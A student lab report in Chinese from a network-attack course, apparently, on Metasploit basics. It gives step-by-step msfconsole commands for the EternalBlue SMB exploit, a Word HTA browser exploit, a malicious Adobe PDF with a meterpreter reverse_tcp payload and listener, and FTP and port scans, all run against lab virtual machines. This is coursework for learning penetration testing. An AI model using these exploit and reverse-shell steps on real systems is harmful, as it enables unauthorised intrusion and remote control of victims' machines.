2018-2019 20165235 网络对抗 Exp5 MSF基础
1. 实践内容(3.5分)
1.1一个主动攻击实践
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
进入msfconsole
输入 use exploit/windows/smb/ms17_010_eternalblue
。并且通过show payloads
显示可用攻击载荷。
设置tcp反向连接:
设置参数:
输入:exploit
渗透成功:
1.2 一个针对浏览器的攻击
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
我们先启动msfconsole
并使用模块use exploit/windows/fileformat/office_word_hta
查看目标show targets
show options
,可以看到已经默认帮我们配置好了,我们只需要run
执行即可,相应的产生了一个URL。
在靶机的IE浏览器中输入KALI中生成的URL,出现一个窗口,点击运行即可:
看到kali那里已经产生了session会话,我们按下回车回到命令行,使用sessions -i 1
来与第一个session
建立连接,再输入shell
拿到权限:
输入指令测试,渗透陈成功:
1.3 一个针对客户端的攻击(Adobe)
本次实验在win7中实验并没有成功,于是我将靶机换成XP系统。
查看靶机ip:
kali输入msfconsole
进入控制台,依次输入以下命令
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.131
use windows/fileformat/adobe_cooltype_sing
:选择攻击模块set payload windows/meterpreter/reverse_tcp
:设置tcp反向连接set LHOST 192.168.21.130
:kali IPset LPORT 5235
:设置攻击端口set FILENAME 20165235.pdf
:设置生成的pdf文件名exploit
:发起攻击
我是第二次做的时候截的屏,所以没有显示文件路径。将20165235.pdf复制到XP中。重启控制台,并且输入以下命令进入监听模块:use exploit/multi/handler
:进入监听模块set payload windows/meterpreter/reverse_tcp
:设置tcp反向连接set LHOST 10.0.0.138
:kali IPset LPORT 5330
:设置攻击端口exploit
:监听
接着在XP中打开20165235.pdf文件:
渗透成功:
关闭20165235.pdf,连接断开:
1.4 成功应用任何一个辅助模块。
auxiliary/scanner/ftp/ftp_version
攻击方:kali 192.168.21.130
靶机: win7 192.169.21.128
本次的模块是通过MSF渗透帮助手册中找到的。功能是可以查询到某一网段中的ftp服务器以及其操作系统的类型。
首先在win7中搭建一个ftp服务器,具体的过程可以上网查找。一下是搭建好的ftp服务器:
测试ftp服务器是否可用:
进入msfconsole
,输入use auxiliary/scanner/ftp/ftp_version
,设置要扫描的网段范围:set RHOSTS 192.168.21.1-254
,设置线程数:set THREADS 55
,(线程数是每次扫描的主机个数。),直接输入run
即可看到结果:192.168.21.128:被扫描出来,并分析出是微软的Windows操作系统。
auxiliary/scanner/portscan/tcp
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
创建msf所需的数据库:service postgresql start
msfdb start
进入msfconsole
,使用auxiliary/scanner/portscan/tcp
模块,用来扫描靶机的TCP端口使用情况。执行命令use auxiliary/scanner/portscan/tcp
进入并使用模块:输入show options
查看需要设置的参数信息:
设置参数:set RHOSTS 192.168.21.128
,set PROTS 1 - 5235
(扫描1到5235端口),之后使用run
,进行扫描。
2 报告内容:
2.1.基础问题回答
(1)用自己的话解释什么是exploit,payload,encode.
- exploit:exploit字面上的意思是“开拓、开发”,exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。但是在MSF中,exploit将负责攻击的代码payload传送到靶机中。
- payload:payload是指:有效载荷。它是靶机被渗透攻击之后执行的恶意代码。
-
encode:是编码的意思。将payload进行多次编码后,使改变其形态。
2.2.实践总结与体会
通过本次的实践,学会了利用MSF进行多种方式的渗透,不敢说能灵活应用并且实战,但是学到了不少东西。在进行实验时,网上的资料太少,而且对好多模块并不知道它的意思以及用法,于是我就翻出它的英文帮助手册,利用翻译软件看懂了使用方法。在以后的学习过程中一定要活学活用。
2.3.离实战还缺些什么技术或步骤
首先是攻击手法单一,应用不灵活,在实战中要求使用多种方法,学会去扫描靶机的漏洞以及可用的端口等。要真正的应用于实战就要我们能灵活的使用MSF提供的大部分的攻击手段,同时也得学会使用其他的攻击平台。